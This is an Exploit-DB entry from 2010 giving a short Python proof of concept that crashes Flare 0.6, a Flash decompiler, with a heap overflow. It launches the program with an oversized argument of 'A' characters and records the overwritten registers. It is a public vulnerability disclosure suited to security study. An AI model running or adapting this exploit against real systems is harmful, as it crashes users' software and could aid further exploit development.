Flare <= 0.6 - Local Heap Overflow DoS

2010-03-06T00:00:00
ID EDB-ID:11644
Type exploitdb
Reporter l3D
Modified 2010-03-06T00:00:00

Description

Flare <= 0.6 Local Heap Overflow DoS. Dos exploits for multiple platform

                                        
                                            # Exploit Title: Flare &lt;= 0.6 local heap overflow DoS
# Date: 3/7/2010
# Author: l3D
# Software Link: http://www.nowrap.de/download/flare06doswin.zip
# Version: 0.6
# Tested on: Windows 7, Windows XP SP2 and some linux distributions
# Code:

#!/usr/bin/env python
#IRC: irc.nix.co.il&lt;http://irc.nix.co.il&gt;
#Site: xraysecurity.blogspot.com&lt;http://xraysecurity.blogspot.com&gt; &lt;---- Coming soon!

#Registers:
#EAX 003E0000
#ECX 003E1088 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."
#EDX 41414141
#EBX 00004141
#ESP 0022FB0C
#EBP 0022FBDC
#ESI 003E1080
#EDI 41414141
#EIP 77195B44 ntdll.77195B44

import os, sys

if len(sys.argv) != 1:
    path=sys.argv[1]
else:
    path='flare.exe'

if not os.path.exists(path):
    print 'Usage: python %s [path to flare.exe]' % sys.argv[0]
    exit(-1)

os.execl(path, path, 'A'*0x1000)